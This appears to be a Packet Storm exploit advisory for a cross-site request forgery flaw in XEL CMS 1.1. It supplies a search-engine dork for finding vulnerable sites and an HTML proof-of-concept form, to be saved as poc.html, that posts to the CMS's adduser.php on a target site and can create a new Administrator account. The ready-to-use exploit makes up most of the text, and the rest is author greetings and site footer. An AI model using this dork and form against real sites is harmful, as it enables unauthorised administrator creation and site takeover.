XEL CMS version 1.1 suffers from a cross site request forgery vulnerability.
8788b29005fabd8ddc16e9318225db83ab2025527c5a78c0beac9e4cbe11d82d====================================================================================================================================
| # Title : XEL cms© v1.1 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://cyberxel.com |
| # Dork : "contact at: +91-98144 06799, z91-161-2408274 email: info@cyberxel.com" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Admin Panel : /xelcms/
[+] infected file : /xelcms/user/adduser.php
[+] line 07 set your target.
[+] save code as poc.html
<style>
@import 'http://cyberxel.com/xelcms/styles/main.css';
#form1 table {
font-size: 12px;
}
</style><link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" /><span class=td><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" /> <a href="users.php" class=td>Users</a> <img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" /> Add user</h2>
</span><br><br><form id="form1" name="form1" method="post" action="TARGET_SITE/xelcms/user/adduser.php">
<table width="99%" border="0" cellpadding="2" cellspacing="2">
<tr>
<td width="8%">Username:</td>
<td width="92%"><label>
<input name="username" type="text" id="username" style="font-size: 10px;width:300" />
</label></td>
</tr>
<tr>
<td>Password:</td>
<td><label>
<input name="password" type="password" id="password" style="font-size: 10px;width:300" />
</label></td>
</tr>
<tr>
<td>Confirm password:</td>
<td><label>
<input name="password2" type="password" id="password2" style="font-size: 10px;width:300" />
</label></td>
</tr>
<tr>
<td>Type:</td>
<td><label>
<select name="type" id="type" style="font-size: 10px;width:300">
<option value="" selected></option>
<option value="Administrator">Administrator</option>
<option value="User">User</option>
</select>
</label></td>
</tr>
<tr>
<td> </td>
<td>
<input type="submit" name="Submit" value="Create user" style="font-size: 10px;" />
</td>
</tr>
</table>
</form>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed